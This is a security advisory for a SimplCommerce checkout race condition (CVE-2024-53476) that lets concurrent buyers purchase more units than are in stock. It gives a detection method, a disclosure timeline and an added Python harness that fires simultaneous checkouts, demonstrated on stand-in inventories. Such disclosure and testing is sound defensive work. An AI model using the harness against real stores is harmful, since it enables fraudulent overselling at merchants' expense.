# CVE-2024-53476

# Description

SimplCommerce is affected by a race condition in its checkout logic. Concurrent checkout requests for the same product are not serialized against the stock check, so multiple users can each complete a purchase and together buy more units than are in stock by submitting their checkout requests simultaneously.

# Detection Method

Set a product's stock to a small value (stock = 1) and, from two separate accounts, submit checkout requests for that product at almost the same time. If both orders succeed, the race condition is confirmed. The concurrent requests can be sent with a custom script or with Burp Suite's Turbo Intruder extension. Because the exploitable window is timing-dependent, a single attempt in which only one order succeeds does not rule out the bug; repeat the test several times before concluding the checkout is safe.

# Tested on

Commit 230310c8d7a0408569b292c5a805c459d47a1d8f

# Links

https://www.simplcommerce.com/
https://github.com/simplcommerce/SimplCommerce
https://github.com/simplcommerce/SimplCommerce/issues/1111

# Disclosure Timeline

- **November 6, 2024**: Vulnerability discovered and reported to SimplCommerce.
- **November 6, 2024**: CVE ID request submitted to MITRE.
- **December 5, 2024**: CVE ID assigned by MITRE.
- **December 21, 2024**: Affected versions patched by the vendor.
- **December 24, 2024**: Public disclosure of the vulnerability.

# Credits

Abdullah Almutawa
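The detection method above, as an added example that is not part of the original advisory and not SimplCommerce's code. The harness releases all checkout calls from behind a barrier so they hit the target in the same instant, then counts how many orders were accepted. To run offline it drives two constructed in-memory inventories: `VulnerableInventory` models a check-then-decrement with no synchronization (the class of bug described above; it is a stand-in, not the project's actual implementation), and `SafeInventory` shows the general fix of making check and decrement atomic (a locking pattern chosen here for illustration, not a description of the vendor's patch). Against a live target, the caller passes a `checkout_fn(account)` that posts the checkout for that account's session and returns `True` on an accepted order; no endpoint path, form field or session format of the application is assumed.

```python
"""Concurrent-checkout race detector (added example, not project code)."""
import threading
import time
from concurrent.futures import ThreadPoolExecutor


class VulnerableInventory:
    """Constructed stand-in for a checkout that reads the stock, decides,
    then writes, with nothing preventing another request from doing the
    same in between.  The sleep widens that window so the race is
    reproducible; on a real server the gap is the DB round-trip."""

    def __init__(self, stock):
        self.stock = stock

    def checkout(self, qty=1):
        if self.stock < qty:        # (1) read and check
            return False
        time.sleep(0.05)            # other requests run here
        self.stock -= qty           # (2) write based on a stale read
        return True


class SafeInventory:
    """Same operation with check and decrement performed atomically under a
    lock.  The database equivalent is a conditional
    UPDATE ... SET stock = stock - qty WHERE stock >= qty and treating an
    affected-row count of 0 as "out of stock"."""

    def __init__(self, stock):
        self.stock = stock
        self._lock = threading.Lock()

    def checkout(self, qty=1):
        with self._lock:
            if self.stock < qty:
                return False
            time.sleep(0.05)
            self.stock -= qty
            return True


def fire_concurrently(actions):
    """Run every zero-argument callable in `actions` at the same moment.

    A Barrier holds each worker until all are ready, so the requests leave
    within microseconds of each other instead of being staggered by thread
    start-up.  Returns the results in the order of `actions`."""
    barrier = threading.Barrier(len(actions))

    def run(action):
        barrier.wait()
        return action()

    with ThreadPoolExecutor(max_workers=len(actions)) as pool:
        return list(pool.map(run, actions))


def race_checkout(checkout_fn, accounts, stock, attempts=3, reset=None):
    """Advisory's test: every account in `accounts` buys the same product,
    which has `stock` units, simultaneously.  `checkout_fn(account)` returns
    True when the order is accepted.  `reset`, if given, restores the stock
    before each attempt (needs admin access on a real target).

    Returns (oversold, most_accepted_orders_in_one_attempt).  More accepted
    orders than stock proves the race; the retries exist because a clean
    single run only means the window was missed that time."""
    worst = 0
    for _ in range(attempts):
        if reset is not None:
            reset()
        results = fire_concurrently([lambda a=a: checkout_fn(a) for a in accounts])
        worst = max(worst, sum(1 for r in results if r))
        if worst > stock:
            break
    return worst > stock, worst


def demo():
    """Offline run against the constructed inventories (no network)."""
    accounts = ["buyer-a", "buyer-b"]   # two sessions, constructed

    vuln = VulnerableInventory(stock=1)
    vuln_result = race_checkout(lambda acct: vuln.checkout(), accounts, stock=1)

    safe = SafeInventory(stock=1)
    safe_result = race_checkout(lambda acct: safe.checkout(), accounts, stock=1)
    return vuln_result, safe_result


if __name__ == "__main__":
    v, s = demo()
    print("unsynchronized checkout oversold:", v)   # (True, 2)
    print("atomic checkout oversold:        ", s)   # (False, 1)
```

With two buyers and stock = 1, the unsynchronized inventory accepts both orders and ends at a stock of -1, which is exactly the "both accounts successfully purchase" signal the advisory describes; the locked inventory accepts one order and rejects the other. When pointing `race_checkout` at a real deployment, keep the per-account sessions logged in beforehand so that authentication latency does not desynchronize the requests, and treat any attempt with more accepted orders than stock as confirmation regardless of how many earlier attempts came back clean.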